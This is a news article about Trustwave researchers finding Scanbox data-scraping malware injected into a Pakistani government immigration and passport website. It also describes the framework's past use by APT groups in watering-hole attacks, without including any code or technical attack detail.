Hackers infected Pakistani immigration website with data-scraping Scanbox malware

Hackers infected Pakistani immigration website with data-scraping Scanbox malware

Hackers infected Pakistani immigration website with data-scraping malware

If you are planning to visit Pakistan soon, you may want to postpone your trip for a while as the Pakistani government's website for immigration and passport services has been leaking personal details of passport applicants to hackers.

Researchers at security firm Trustwave recently observed that hackers had breached tracking.dgip.gov.pk, a website owned by the Directorate General of Immigration & Passport of the Pakistani government, and injected a payload known as the Scanbox Framework into the domain.

Scanbox is a well-known malware payload used widely by cyber criminals to gather information about visitors to targeted websites and to scrape information filled by visitors on online forms. While it is not known when Scanbox was injected into the Pakistani government's website for immigration and passport services, researchers are certain that hackers behind the payload have been harvesting detailed personal information of people who visited the domain in the recent past.

The researchers first observed Scanbox on the breached website on 2nd March and on that day alone, Scanbox managed to collect information on at least 70 unique site visitors, about a third of them with recorded credentials.

Scanbox used in multiple cyber attack campaigns

"Scanbox Framework is a reconnaissance framework that was first mentioned back in 2014 and has been linked over the years to several different APT groups. Its intense activity during the 2014-2015 years has been well-covered in a paper written by PwC. It was then seen again in 2017 suspected to be used by the Stone Panda APT group, and once more in 2018 in connection with LuckyMouse.

"Scanbox was used in a variety of watering hole attacks, meaning the attacker infected a site with Scanbox in order to gather information about visitors to the site (gathering all the information you’d expect like IP, referrer, OS, User Agent, plugins, etc.) to, later on, tailor sophisticated targeted attacks for interesting visitors. With every appearance, it seems to have evolved in terms of the kinds of information it gathers," Trustwave said.

According to the firm, neither has the Pakistani government responded to the firm highlighting the presence of Scanbox on its website nor has it taken any action to evict the payload from the affected site. What this means is that people should avoid visiting the domain or entering any personal information in it to prevent their personal data from falling into the hands of cyber criminals.

ALSO READ: Cyber criminals combining Vidar & GandCrab malware to infect devices

Copyright Lyonsdown Limited 2021

Top Articles

Overcoming the security challenge in remote working environments

The pandemic has changed the way we work. Remote working is no longer a nice-to-have for organisations, but a necessity especially if they want to attract the best talent.

President Biden pens Executive Order to boost US cybersecurity

US President Joe Biden signed an Executive Order this week to boost the cyber security of federal government systems and data.

DarkSide ransomware gang shuts shop following 'law enforcement request'

The DarkSide ransomware group has announced it is shutting shop as its servers and cryptocurrency accounts were allegedly seized "at the request of law enforcement agencies."

Related Articles